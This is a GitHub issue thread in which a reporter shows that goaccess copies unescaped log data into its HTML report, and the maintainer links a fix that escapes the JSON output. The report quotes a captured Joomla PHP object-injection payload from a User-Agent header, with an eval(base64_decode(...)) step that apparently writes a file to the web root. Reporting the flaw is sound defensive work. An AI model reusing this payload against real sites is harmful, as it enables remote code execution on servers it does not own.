### ISSUE TITLE
php comes thru

### ISSUE THREAD

**Issue by lolzim** [allinurl/goaccess#487]
Hi,

I had a website with logfile lines like this:

    198.1.2.3 - - [01/Aug/2016:03:11:30 +0200] "GET / HTTP/1.1" 200 6486 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3878:\"**eval(base64_decode**('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRzl3ZENna2FXMHNJRU5WVWt4UFGcGJDZ2tkRzk2TENBa2MzVmlhbVZqZEN3Z0pHMWxjM05oWjJVc0lDUm9aV0ZrWlhJcE93MEtEUXBBZFc1c2FXNXJLRjlmUmtsTVJWOWZLVHNOQ2cwS0RRby9QZz09JykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

(NB: I cut most part of the base64 encoded stuff)

Once static HTML file created with goaccess, it contains, in JS code:

    ...sitors": {"count": 2,"percent": 0.20},"bytes": {"count": 66678,"percent": 0.10},"data": "23.96.18.251","country": "Country Unknown","items": ["Mozilla\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/46.0.2490.80 Safari\/537.36","Python-urllib\/2.6","}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:5671:\\\"eval(base64_decode(\\\"JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAu...

As I put this into .html files, ther's no risk this code to be run, but for users creating .php files as output from GoAcces, this may leads to code injection (if a '<?php' is added, sure)

Best regards

**Comment by allinurl** [comment]
Thank you for reporting this. It can indeed be a problem. Although GoAccess doesn't allow the creation of a php file, I'd assume a user can always make the HTML a php file.

I have pushed a [**fix**](https://github.com/allinurl/goaccess/commit/cfac82341dd6e06b9e0cb9f76dc225edb1ac5fbf) for this. It will escape the JSON output before it gets bootstrapped into the document.

Please feel free to build from [**development**](https://github.com/allinurl/goaccess#build-from-github-development) and let me know  if that addresses the issue for you. Otherwise, it will be pushed out in the upcoming release.
